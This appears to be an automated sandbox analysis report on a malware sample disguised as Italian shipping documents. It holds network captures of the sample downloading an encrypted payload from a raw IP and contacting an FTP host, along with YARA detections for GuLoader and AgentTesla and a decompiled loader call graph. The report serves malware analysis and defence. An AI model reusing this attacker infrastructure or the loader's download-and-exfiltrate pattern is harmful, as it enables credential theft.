                                          Oct 21, 2024 08:25:15.204933882 CEST44364703104.26.13.205192.168.2.5
                                          Oct 21, 2024 08:25:15.204996109 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:15.211796045 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:16.496897936 CEST6470421192.168.2.5192.185.13.234
                                          Oct 21, 2024 08:25:16.501951933 CEST2164704192.185.13.234192.168.2.5
                                          Oct 21, 2024 08:25:16.502033949 CEST6470421192.168.2.5192.185.13.234
                                          Oct 21, 2024 08:25:16.506221056 CEST6470421192.168.2.5192.185.13.234
                                          Oct 21, 2024 08:25:16.512188911 CEST2164704192.185.13.234192.168.2.5
                                          Oct 21, 2024 08:25:16.512250900 CEST6470421192.168.2.5192.185.13.234
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 21, 2024 08:24:27.283073902 CEST5360097162.159.36.2192.168.2.5
                                          Oct 21, 2024 08:24:27.893587112 CEST5361953192.168.2.51.1.1.1
                                          Oct 21, 2024 08:24:27.900473118 CEST53536191.1.1.1192.168.2.5
                                          Oct 21, 2024 08:25:14.306066990 CEST5720953192.168.2.51.1.1.1
                                          Oct 21, 2024 08:25:14.312736988 CEST53572091.1.1.1192.168.2.5
                                          Oct 21, 2024 08:25:16.177403927 CEST6145453192.168.2.51.1.1.1
                                          Oct 21, 2024 08:25:16.493046999 CEST53614541.1.1.1192.168.2.5
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 21, 2024 08:24:27.893587112 CEST192.168.2.51.1.1.10xefStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                          Oct 21, 2024 08:25:14.306066990 CEST192.168.2.51.1.1.10x8538Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                          Oct 21, 2024 08:25:16.177403927 CEST192.168.2.51.1.1.10x2efeStandard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 21, 2024 08:24:27.900473118 CEST1.1.1.1192.168.2.50xefName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                          Oct 21, 2024 08:25:14.312736988 CEST1.1.1.1192.168.2.50x8538No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                          Oct 21, 2024 08:25:14.312736988 CEST1.1.1.1192.168.2.50x8538No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                          Oct 21, 2024 08:25:14.312736988 CEST1.1.1.1192.168.2.50x8538No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                          Oct 21, 2024 08:25:16.493046999 CEST1.1.1.1192.168.2.50x2efeNo error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                          Oct 21, 2024 08:25:16.493046999 CEST1.1.1.1192.168.2.50x2efeNo error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                          • api.ipify.org
                                          • 84.38.129.16
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.56470284.38.129.16806360C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 21, 2024 08:25:11.209271908 CEST171OUTGET /rNWbaMk175.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: 84.38.129.16
                                          Cache-Control: no-cache
                                          Oct 21, 2024 08:25:12.066445112 CEST1236INHTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Mon, 21 Oct 2024 00:14:33 GMT
                                          Accept-Ranges: bytes
                                          ETag: "58afed344e23db1:0"
                                          Server: Microsoft-IIS/8.5
                                          Date: Mon, 21 Oct 2024 06:25:10 GMT
                                          Content-Length: 241728
                                          Data Raw: 52 ef 6a 38 0e c5 2d 50 c8 be 91 02 87 86 1e 72 e2 5e 28 c3 62 bc 5c 15 0e c4 c7 8a 67 41 5e d4 e6 7d 71 80 af eb 3c 80 d6 5b c0 c8 a9 46 2b 09 26 80 cf 61 8c a9 a2 41 ef 4d 3e 26 86 56 58 0f 97 49 7f c6 5a f3 1c 53 8e 65 47 76 4a e7 73 a1 ce 59 47 eb 4b 6f 3b cf a4 40 f9 53 84 62 17 c4 ff 9d 0a 04 9b dd b1 1b c2 c0 7b 74 68 34 fa ef bc 00 b6 d3 ba 58 27 d6 43 93 ca 95 1b 1c 57 4d 9d 42 7a 48 96 c0 95 96 fc fb c7 e4 a1 8b 77 89 31 ff b3 38 91 d8 a3 9c bb f6 48 18 37 32 65 f1 5d 58 d5 05 f5 df a1 93 e8 a3 31 66 71 dd 42 01 29 63 88 6c 60 5e 5a 8f 41 83 95 6b a3 86 28 47 c1 ee 65 f4 47 58 c7 11 2e cf ce f3 bb 71 b8 7b 5c 6b 68 e1 db b1 5b 1c ce e5 d0 f8 f8 24 de 8c 8a 17 9c 31 bf 6a b8 d4 4b f3 04 12 d3 28 b7 6b cc fd 83 bc e9 2e bf cc c1 b4 ae 4c ca 9b ef 81 0d 94 8c 30 aa fd 3d 15 79 f5 f3 05 a0 3b 4c 81 12 aa 31 ca e4 f1 31 39 e9 6e 48 73 4a a1 f5 cd f9 6c da 26 97 b0 ce 21 4b 10 03 be 82 f1 26 24 8b 54 35 99 97 be 72 d3 6d 9d e0 09 6f 24 5f 81 48 39 57 88 f4 fb a5 bf 31 e5 c3 b5 77 95 22 fb bb eb [TRUNCATED]
                                          Data Ascii: Rj8-Pr^(b\gA^}q<[F+&aAM>&VXIZSeGvJsYGKo;@Sb{th4X'CWMBzHw18H72e]X1fqB)cl`^ZAk(GeGX.q{\kh[$1jK(k.L0=y;L119nHsJl&!K&$T5rmo$_H9W1w"3EZx`.XxYJt>,cjO3l'x3,dlnR4z%K<xiwL(94$vwD+$kUF%*[}EUXHeEO=1dm:B99F}yELiikUqc]h**p="C+(r%ElK]ARQ!%y&Cj`PWLtf_f^aL^iRl'{y0{W#-vuEBPEYpIA:=ItHj0_|z(v9[_EMcQtiA"RL ZGU]uwz}@ib\v>HP3oIT31mElFMP)jho{{epPPfCEGj BC/w@Y@3<ZGHA;~M+y8q{?6}YYV~0 Ds5#l3Bkj:Oc3*Gjq
                                          Oct 21, 2024 08:25:12.066463947 CEST1236INData Raw: a7 d0 26 a1 09 f4 86 1e 86 b0 e3 ee 3c 71 b9 5b 4b 6a 27 c9 eb 8c c7 25 25 85 ed 26 55 8c 45 0a 84 62 5c a3 9f cd cb 24 1b 17 87 8b 8d 88 a5 17 3c 04 32 52 62 08 21 f0 3c c0 c6 8f 5e c7 0a 8e 64 6f 9d 84 82 e3 58 ad 12 96 8f 03 d5 c4 f6 5f 92 db
                                          Data Ascii: &<q[Kj'%%&UEb\$<2Rb!<^doX_^-29_+6ZXSDHcEKL])8z8N9.BlR)]@}9 t;YQtchvvYA*o;^(b1\41(B4V-]ft[U8
                                          Oct 21, 2024 08:25:12.066476107 CEST424INData Raw: ba 7b 8e a9 6b 82 c4 e6 ad 2a 9c 34 ac 75 82 ec d2 0c d5 da ad f9 77 34 bb f1 20 70 dc 39 f1 c4 22 6b 1c 53 8e 4f 65 74 b6 65 eb a1 76 5d 6d a1 49 47 28 cf e4 4a fb 21 03 43 17 b4 d7 70 0a 04 9d f7 af 19 b9 59 7b 74 6c 1e d8 ed bf 7d 2f d3 ba 5c
                                          Data Ascii: {k*4uw4 p9"kSOetev]mIG(J!CpY{tl}/\AU?`6[i0#\J^B1Tt)r>=_F3#?JyufkvSc{ZAv@-YA{B<`!L0_1N50
                                          Oct 21, 2024 08:25:12.066488028 CEST1236INData Raw: 86 37 82 19 2e af ed 19 42 0f bc 28 e9 b8 5d 5b b5 eb 57 c6 69 5c 8f 84 2b f1 23 dd a9 05 d5 71 c6 85 f7 2a 14 fb dd e0 c5 5a 80 ca 6d b8 b6 72 98 98 31 60 e1 d4 b4 f8 8b 3a a2 8d e8 d5 c3 8c c0 87 0f e3 31 d1 82 e5 c2 ac 7b f8 04 11 64 07 08 14
                                          Data Ascii: 7.B(][Wi\+#q*Zmr1`:1{dyAfioS]h.nF&a)+\tFr]cQ4h!nR5CDX`Q}pL3\fc!L\)=jygt_!?1<~WuH$C;T7ZjqK?g
                                          Oct 21, 2024 08:25:12.066500902 CEST1236INData Raw: 98 7e 0c 4d cd e4 f0 b8 81 11 37 9e af 94 7a fa ea 54 72 d3 84 4c 18 cf 6a 64 39 f2 5d 90 be 4c f5 a5 f6 46 63 09 ce e0 4f f6 06 68 52 0a ba 97 9b 88 e2 97 68 0d d4 79 02 75 66 74 87 5f 09 8b 9b d6 7c 17 ca 37 8e 70 d4 00 46 84 52 40 c7 50 02 a5
                                          Data Ascii: ~M7zTrLjd9]LFcOhRhyuft_|7pFR@P}jh(apLWb\m7[n{~dr)3LW)mszo!GIVp<m<Rl8J Ix16P,5C+'0,,
                                          Oct 21, 2024 08:25:12.066512108 CEST424INData Raw: 06 24 9b 1a fc 1b 11 e7 ac 19 19 2a e4 a3 fd 39 8d 38 91 8f 04 a2 78 07 b9 e1 d5 21 a6 f7 43 ac 6f ee cf 92 d8 48 ba 0b 5b 86 3d 69 32 9b e8 16 d3 87 b2 5b a0 14 18 4e 38 03 3a 17 b2 80 94 ff 22 49 b6 68 da 33 8e b9 af fe cb 87 49 d1 37 8f c2 36
                                          Data Ascii: $*98x!CoH[=i2[N8:"Ih3I76>5|.-epPHQ_E1`<LY]dp!Xy3<ZMGJBT:NGKGnM|?l-PjUqX4}WF4am;9=
                                          Oct 21, 2024 08:25:12.193813086 CEST1236INData Raw: 33 ee c6 59 f3 62 56 8a 65 43 04 bc 18 73 d1 04 54 47 eb 3b 00 2e cf e4 4a 5b ad 88 61 17 e4 fd 9d 0a 04 e9 cc b1 1b b2 62 85 78 6b 34 da ec bc 00 b6 fb ac 58 27 dc bd 9d ce 95 65 11 53 4d e1 48 c0 46 e6 5c 8b 5b dd 49 64 56 60 a9 23 c1 5c 8c 93
                                          Data Ascii: 3YbVeCsTG;.J[abxk4X'eSMHF\[IdV`#\H9wU\#)x_F3l!D~N#eC(AL)e:$qikh\;m1*32kjJv'79LkHSKHe&5^$K0TTE;
                                          Oct 21, 2024 08:25:12.193834066 CEST1236INData Raw: 45 7d bb 7b a2 67 6a e1 54 16 58 1d c3 96 3c f8 f8 f2 f5 96 8a 1f 96 4c 91 6b b8 d0 5b 3a 04 12 a1 f9 b7 6b bc 60 b0 bd e9 2a 01 c0 c2 94 c1 7f ca 99 e5 7f 04 91 8c 18 9e fd 3d 1f 47 96 0c fa 5f e6 5c 81 12 8a cb c7 e1 f3 cf 2f ef 6e 48 68 27 87
                                          Data Ascii: E}{gjTX<Lk[:k`*=G_\/nHh'H4*K@&KT5ytEeQX11"v3DZd]x^ixYJ:,MjK&d?&n'x3Ky/dlkR=zU$)xUsLT(D5Y
                                          Oct 21, 2024 08:25:12.193845034 CEST1236INData Raw: a0 64 b5 59 78 d0 ed df 89 de 9e 80 c8 ed 2e 58 97 93 dc 78 c8 9e aa 12 49 74 d9 1e 3f e3 63 eb 94 41 87 9a 33 62 a7 05 6c 87 26 78 c8 89 cd 90 b3 fe 87 bb 96 e7 88 2c 64 6c 5a a5 6e 52 1f 66 b3 35 b3 5a 27 f2 18 db f3 fb 48 3c 96 86 bf f4 69 5f
                                          Data Ascii: dYx.XxIt?cA3bl&x,dlZnRf5Z'H<i_LP.a9:\VA$kU,F%`+[qk!+{wFZzL=1-:\!7yfi~FLeifUq@h**<"C)rtnlL#
                                          Oct 21, 2024 08:25:12.193855047 CEST1236INData Raw: 71 85 2b f5 09 01 a7 06 a8 f5 c4 85 f3 00 f4 f8 9f 5d c5 5a 84 c8 74 ba b5 05 52 a4 31 64 c1 4a b0 83 2d 3e 82 8a c2 f7 c1 71 b3 21 0f e3 cb f7 9c e7 99 0d 7b f8 00 c5 47 3c 18 69 7e 79 fb 4d 4c ef e7 50 ba 68 80 6b 75 76 f6 06 b6 df 53 68 2a 2a
                                          Data Ascii: q+]ZtR1dJ->q!{G<i~yMLPhkuvSh**="C)KtFsE<oI$Z#C$j`aPW{M%tfb^kwLvTRL#{yitu^:5ofuBl1V#wuk<IUQ?do:
                                          Oct 21, 2024 08:25:12.193867922 CEST1236INData Raw: 1c 1b 78 6e 11 99 16 90 b8 6c 5d a9 d7 5e 41 28 c8 e2 4c 75 50 65 52 0e 46 9f ea d1 c3 8b 6c 27 ca 85 78 14 4e 74 83 75 fd 90 b7 c8 05 7f ed 35 8a 88 f2 51 44 8c 75 42 c7 56 fe ab 3d 24 64 25 86 a5 0f 16 89 16 7d cd a0 ce 75 61 2a 71 32 86 ca ec
                                          Data Ascii: xnl]^A(LuPeRFl'xNtu5QDuBV=$d%}ua*q2EUnQ?]5wcy%+q'N'(*$;8op3xGv"coUD0iyn9L"IH^3G4X,97RH9\C1Pi|PAfD&j


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.564703104.26.13.2054436360C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-21 06:25:15 UTC155OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                          Host: api.ipify.org
                                          Connection: Keep-Alive
                                          2024-10-21 06:25:15 UTC211INHTTP/1.1 200 OK
                                          Date: Mon, 21 Oct 2024 06:25:15 GMT
                                          Content-Type: text/plain
                                          Content-Length: 14
                                          Connection: close
                                          Vary: Origin
                                          CF-Cache-Status: DYNAMIC
                                          Server: cloudflare
                                          CF-RAY: 8d5f2b554e983ab8-DFW
                                          2024-10-21 06:25:15 UTC14INData Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36
                                          Data Ascii: 155.94.241.186


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:02:23:52
                                          Start date:21/10/2024
                                          Path:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
                                          Imagebase:0x400000
                                          File size:1'007'169 bytes
                                          MD5 hash:C2D72D131FE371481A0CC117BB835F23
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2622907662.0000000007225000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:4
                                          Start time:02:24:53
                                          Start date:21/10/2024
                                          Path:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"
                                          Imagebase:0x400000
                                          File size:1'007'169 bytes
                                          MD5 hash:C2D72D131FE371481A0CC117BB835F23
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3268012189.0000000035D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3268012189.0000000035D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:24.1%
                                            Dynamic/Decrypted Code Coverage:13.9%
                                            Signature Coverage:21.3%
                                            Total number of Nodes:1520
                                            Total number of Limit Nodes:53
                                            execution_graph 5065 10001000 5068 1000101b 5065->5068 5075 100014bb 5068->5075 5070 10001020 5071 10001024 5070->5071 5072 10001027 GlobalAlloc 5070->5072 5073 100014e2 3 API calls 5071->5073 5072->5071 5074 10001019 5073->5074 5077 100014c1 5075->5077 5076 100014c7 5076->5070 5077->5076 5078 100014d3 GlobalFree 5077->5078 5078->5070 3917 402241 3932 402ace 3917->3932 3920 402ace 18 API calls 3921 402250 3920->3921 3922 402ace 18 API calls 3921->3922 3923 402259 3922->3923 3938 4061fb FindFirstFileA 3923->3938 3926 402273 lstrlenA lstrlenA 3929 405110 25 API calls 3926->3929 3927 402266 3941 405110 3927->3941 3930 4022af SHFileOperationA 3929->3930 3930->3927 3931 40226e 3930->3931 3933 402ada 3932->3933 3952 405f19 3933->3952 3936 402247 3936->3920 3939 406211 FindClose 3938->3939 3940 402262 3938->3940 3939->3940 3940->3926 3940->3927 3942 40512b 3941->3942 3951 4051ce 3941->3951 3943 405148 lstrlenA 3942->3943 3944 405f19 18 API calls 3942->3944 3945 405171 3943->3945 3946 405156 lstrlenA 3943->3946 3944->3943 3948 405184 3945->3948 3949 405177 SetWindowTextA 3945->3949 3947 405168 lstrcatA 3946->3947 3946->3951 3947->3945 3950 40518a SendMessageA SendMessageA SendMessageA 3948->3950 3948->3951 3949->3948 3950->3951 3951->3931 3968 405f26 3952->3968 3953 406149 3954 402afb 3953->3954 3986 405ef7 lstrcpynA 3953->3986 3954->3936 3970 406162 3954->3970 3956 405fc7 GetVersion 3956->3968 3957 406120 lstrlenA 3957->3968 3958 405f19 10 API calls 3958->3957 3962 40603f GetSystemDirectoryA 3962->3968 3963 406052 GetWindowsDirectoryA 3963->3968 3964 406162 5 API calls 3964->3968 3965 405f19 10 API calls 3965->3968 3966 4060c9 lstrcatA 3966->3968 3967 406086 SHGetSpecialFolderLocation 3967->3968 3969 40609e SHGetPathFromIDListA CoTaskMemFree 3967->3969 3968->3953 3968->3956 3968->3957 3968->3958 3968->3962 3968->3963 3968->3964 3968->3965 3968->3966 3968->3967 3979 405dde RegOpenKeyExA 3968->3979 3984 405e55 wsprintfA 3968->3984 3985 405ef7 lstrcpynA 3968->3985 3969->3968 3977 40616e 3970->3977 3971 4061da CharPrevA 3975 4061d6 3971->3975 3972 4061cb CharNextA 3972->3975 3972->3977 3973 4061f5 3973->3936 3975->3971 3975->3973 3976 4061b9 CharNextA 3976->3977 3977->3972 3977->3975 3977->3976 3978 4061c6 CharNextA 3977->3978 3987 405994 3977->3987 3978->3972 3980 405e11 RegQueryValueExA 3979->3980 3981 405e4f 3979->3981 3982 405e32 RegCloseKey 3980->3982 3981->3968 3982->3981 3984->3968 3985->3968 3986->3954 3988 40599a 3987->3988 3989 4059ad 3988->3989 3990 4059a0 CharNextA 3988->3990 3989->3977 3990->3988 5079 406542 5083 4063c6 5079->5083 5080 406d31 5081 406450 GlobalAlloc 5081->5080 5081->5083 5082 406447 GlobalFree 5082->5081 5083->5080 5083->5081 5083->5082 5084 4064c7 GlobalAlloc 5083->5084 5085 4064be GlobalFree 5083->5085 5084->5080 5084->5083 5085->5084 5086 4022c3 5087 4022dd 5086->5087 5088 4022ca 5086->5088 5089 405f19 18 API calls 5088->5089 5090 4022d7 5089->5090 5091 4056ed MessageBoxIndirectA 5090->5091 5091->5087 4032 401746 4033 402ace 18 API calls 4032->4033 4034 40174d 4033->4034 4038 405b99 4034->4038 4036 401754 4037 405b99 2 API calls 4036->4037 4037->4036 4039 405ba4 GetTickCount GetTempFileNameA 4038->4039 4040 405bd1 4039->4040 4041 405bd5 4039->4041 4040->4039 4040->4041 4041->4036 5092 4026c7 5093 4026cd 5092->5093 5094 4026d5 FindClose 5093->5094 5095 40295e 5093->5095 5094->5095 5096 401947 5097 402ace 18 API calls 5096->5097 5098 40194e lstrlenA 5097->5098 5099 40258a 5098->5099 5100 402749 5101 402ace 18 API calls 5100->5101 5102 402757 5101->5102 5103 40276d 5102->5103 5104 402ace 18 API calls 5102->5104 5105 405b45 2 API calls 5103->5105 5104->5103 5106 402773 5105->5106 5128 405b6a GetFileAttributesA CreateFileA 5106->5128 5108 402780 5109 402823 5108->5109 5110 40278c GlobalAlloc 5108->5110 5113 40282b DeleteFileA 5109->5113 5114 40283e 5109->5114 5111 4027a5 5110->5111 5112 40281a CloseHandle 5110->5112 5129 403277 SetFilePointer 5111->5129 5112->5109 5113->5114 5116 4027ab 5117 403261 ReadFile 5116->5117 5118 4027b4 GlobalAlloc 5117->5118 5119 4027c4 5118->5119 5120 4027f8 5118->5120 5122 402ff0 45 API calls 5119->5122 5121 405c11 WriteFile 5120->5121 5123 402804 GlobalFree 5121->5123 5127 4027d1 5122->5127 5124 402ff0 45 API calls 5123->5124 5125 402817 5124->5125 5125->5112 5126 4027ef GlobalFree 5126->5120 5127->5126 5128->5108 5129->5116 4145 1000270b 4146 1000275b 4145->4146 4147 1000271b VirtualProtect 4145->4147 4147->4146 4158 4020cd 4159 402ace 18 API calls 4158->4159 4160 4020d4 4159->4160 4161 402ace 18 API calls 4160->4161 4162 4020de 4161->4162 4163 402ace 18 API calls 4162->4163 4164 4020e8 4163->4164 4165 402ace 18 API calls 4164->4165 4166 4020f2 4165->4166 4167 402ace 18 API calls 4166->4167 4168 4020fc 4167->4168 4169 40213b CoCreateInstance 4168->4169 4170 402ace 18 API calls 4168->4170 4173 40215a 4169->4173 4175 402202 4169->4175 4170->4169 4172 402238 4174 4021e2 MultiByteToWideChar 4173->4174 4173->4175 4174->4175 4175->4172 4176 401423 4175->4176 4177 405110 25 API calls 4176->4177 4178 401431 4177->4178 4178->4172 5140 1000180d 5141 10001830 5140->5141 5142 10001860 GlobalFree 5141->5142 5143 10001872 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5141->5143 5142->5143 5144 10001266 2 API calls 5143->5144 5145 100019e3 GlobalFree GlobalFree 5144->5145 4179 40524e 4180 405270 GetDlgItem GetDlgItem GetDlgItem 4179->4180 4181 4053f9 4179->4181 4225 404111 SendMessageA 4180->4225 4183 405401 GetDlgItem CreateThread CloseHandle 4181->4183 4184 405429 4181->4184 4183->4184 4228 4051e2 OleInitialize 4183->4228 4185 405457 4184->4185 4187 405478 4184->4187 4188 40543f ShowWindow ShowWindow 4184->4188 4189 4054b2 4185->4189 4190 40545f 4185->4190 4186 4052e0 4191 4052e7 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4186->4191 4195 404143 8 API calls 4187->4195 4227 404111 SendMessageA 4188->4227 4189->4187 4200 4054bf SendMessageA 4189->4200 4193 405467 4190->4193 4194 40548b ShowWindow 4190->4194 4198 405355 4191->4198 4199 405339 SendMessageA SendMessageA 4191->4199 4201 4040b5 SendMessageA 4193->4201 4196 4054ab 4194->4196 4197 40549d 4194->4197 4202 405484 4195->4202 4204 4040b5 SendMessageA 4196->4204 4203 405110 25 API calls 4197->4203 4205 405368 4198->4205 4206 40535a SendMessageA 4198->4206 4199->4198 4200->4202 4207 4054d8 CreatePopupMenu 4200->4207 4201->4187 4203->4196 4204->4189 4209 4040dc 19 API calls 4205->4209 4206->4205 4208 405f19 18 API calls 4207->4208 4210 4054e8 AppendMenuA 4208->4210 4211 405378 4209->4211 4212 405506 GetWindowRect 4210->4212 4213 405519 TrackPopupMenu 4210->4213 4214 405381 ShowWindow 4211->4214 4215 4053b5 GetDlgItem SendMessageA 4211->4215 4212->4213 4213->4202 4217 405535 4213->4217 4218 4053a4 4214->4218 4219 405397 ShowWindow 4214->4219 4215->4202 4216 4053dc SendMessageA SendMessageA 4215->4216 4216->4202 4220 405554 SendMessageA 4217->4220 4226 404111 SendMessageA 4218->4226 4219->4218 4220->4220 4221 405571 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4220->4221 4223 405593 SendMessageA 4221->4223 4223->4223 4224 4055b5 GlobalUnlock SetClipboardData CloseClipboard 4223->4224 4224->4202 4225->4186 4226->4215 4227->4185 4229 404128 SendMessageA 4228->4229 4230 405205 4229->4230 4233 401389 2 API calls 4230->4233 4234 40522c 4230->4234 4231 404128 SendMessageA 4232 40523e OleUninitialize 4231->4232 4233->4230 4234->4231 4246 4023d3 4247 4023d9 4246->4247 4248 402ace 18 API calls 4247->4248 4249 4023eb 4248->4249 4250 402ace 18 API calls 4249->4250 4251 4023f5 RegCreateKeyExA 4250->4251 4252 402729 4251->4252 4253 40241f 4251->4253 4254 402437 4253->4254 4255 402ace 18 API calls 4253->4255 4256 402443 4254->4256 4258 402aac 18 API calls 4254->4258 4257 402430 lstrlenA 4255->4257 4259 402462 RegSetValueExA 4256->4259 4263 402ff0 4256->4263 4257->4254 4258->4256 4261 402478 RegCloseKey 4259->4261 4261->4252 4264 40301b 4263->4264 4265 402fff SetFilePointer 4263->4265 4278 4030f8 GetTickCount 4264->4278 4265->4264 4268 4030b8 4268->4259 4271 4030f8 43 API calls 4272 403052 4271->4272 4272->4268 4273 4030be ReadFile 4272->4273 4275 403061 4272->4275 4273->4268 4275->4268 4276 405be2 ReadFile 4275->4276 4277 405c11 WriteFile 4275->4277 4276->4275 4277->4275 4279 403250 4278->4279 4280 403126 4278->4280 4281 402cab 33 API calls 4279->4281 4293 403277 SetFilePointer 4280->4293 4288 403022 4281->4288 4283 403131 SetFilePointer 4287 403156 4283->4287 4287->4288 4289 405c11 WriteFile 4287->4289 4290 403231 SetFilePointer 4287->4290 4294 403261 4287->4294 4297 406393 4287->4297 4304 402cab 4287->4304 4288->4268 4291 405be2 ReadFile 4288->4291 4289->4287 4290->4279 4292 40303b 4291->4292 4292->4268 4292->4271 4293->4283 4295 405be2 ReadFile 4294->4295 4296 403274 4295->4296 4296->4287 4298 4063b8 4297->4298 4301 4063c0 4297->4301 4298->4287 4299 406450 GlobalAlloc 4299->4298 4299->4301 4300 406447 GlobalFree 4300->4299 4301->4298 4301->4299 4301->4300 4301->4301 4302 4064c7 GlobalAlloc 4301->4302 4303 4064be GlobalFree 4301->4303 4302->4298 4302->4301 4303->4302 4305 402cd1 4304->4305 4306 402cb9 4304->4306 4307 402ce1 GetTickCount 4305->4307 4308 402cd9 4305->4308 4309 402cc2 DestroyWindow 4306->4309 4310 402cc9 4306->4310 4307->4310 4312 402cef 4307->4312 4319 4062cc 4308->4319 4309->4310 4310->4287 4313 402d24 CreateDialogParamA ShowWindow 4312->4313 4314 402cf7 4312->4314 4313->4310 4314->4310 4323 402c8f 4314->4323 4316 402d05 wsprintfA 4317 405110 25 API calls 4316->4317 4318 402d22 4317->4318 4318->4310 4320 4062e9 PeekMessageA 4319->4320 4321 4062f9 4320->4321 4322 4062df DispatchMessageA 4320->4322 4321->4310 4322->4320 4324 402ca0 MulDiv 4323->4324 4325 402c9e 4323->4325 4324->4316 4325->4324 5146 4044d3 5147 4044e3 5146->5147 5148 404509 5146->5148 5149 4040dc 19 API calls 5147->5149 5150 404143 8 API calls 5148->5150 5151 4044f0 SetDlgItemTextA 5149->5151 5152 404515 5150->5152 5151->5148 5153 401cd4 5154 402aac 18 API calls 5153->5154 5155 401cda IsWindow 5154->5155 5156 401a0e 5155->5156 4326 4014d6 4327 402aac 18 API calls 4326->4327 4328 4014dc Sleep 4327->4328 4330 40295e 4328->4330 4331 4025d7 4332 402aac 18 API calls 4331->4332 4334 4025e1 4332->4334 4333 40264f 4334->4333 4335 405be2 ReadFile 4334->4335 4336 402651 4334->4336 4339 402661 4334->4339 4335->4334 4340 405e55 wsprintfA 4336->4340 4338 402677 SetFilePointer 4338->4333 4339->4333 4339->4338 4340->4333 4341 401759 4342 402ace 18 API calls 4341->4342 4343 401760 4342->4343 4344 401786 4343->4344 4345 40177e 4343->4345 4381 405ef7 lstrcpynA 4344->4381 4380 405ef7 lstrcpynA 4345->4380 4348 401784 4352 406162 5 API calls 4348->4352 4349 401791 4382 405969 lstrlenA CharPrevA 4349->4382 4376 4017a3 4352->4376 4353 4061fb 2 API calls 4353->4376 4356 4017ba CompareFileTime 4356->4376 4357 40187e 4358 405110 25 API calls 4357->4358 4360 401888 4358->4360 4359 401855 4361 405110 25 API calls 4359->4361 4378 40186a 4359->4378 4362 402ff0 45 API calls 4360->4362 4361->4378 4363 40189b 4362->4363 4365 4018af SetFileTime 4363->4365 4367 4018c1 CloseHandle 4363->4367 4364 405ef7 lstrcpynA 4364->4376 4365->4367 4366 405f19 18 API calls 4366->4376 4368 4018d2 4367->4368 4367->4378 4369 4018d7 4368->4369 4370 4018ea 4368->4370 4371 405f19 18 API calls 4369->4371 4372 405f19 18 API calls 4370->4372 4374 4018df lstrcatA 4371->4374 4375 4018f2 4372->4375 4374->4375 4377 4056ed MessageBoxIndirectA 4375->4377 4376->4353 4376->4356 4376->4357 4376->4359 4376->4364 4376->4366 4379 405b6a GetFileAttributesA CreateFileA 4376->4379 4385 405b45 GetFileAttributesA 4376->4385 4388 4056ed 4376->4388 4377->4378 4379->4376 4380->4348 4381->4349 4383 405983 lstrcatA 4382->4383 4384 401797 lstrcatA 4382->4384 4383->4384 4384->4348 4386 405b64 4385->4386 4387 405b57 SetFileAttributesA 4385->4387 4386->4376 4387->4386 4389 405702 4388->4389 4390 40574e 4389->4390 4391 405716 MessageBoxIndirectA 4389->4391 4390->4376 4391->4390 4392 401e59 4393 402ace 18 API calls 4392->4393 4394 401e5f 4393->4394 4395 402ace 18 API calls 4394->4395 4396 401e68 4395->4396 4397 402ace 18 API calls 4396->4397 4398 401e71 4397->4398 4399 402ace 18 API calls 4398->4399 4400 401e7a 4399->4400 4401 401423 25 API calls 4400->4401 4402 401e81 ShellExecuteA 4401->4402 4403 401eae 4402->4403 5157 401659 5158 402ace 18 API calls 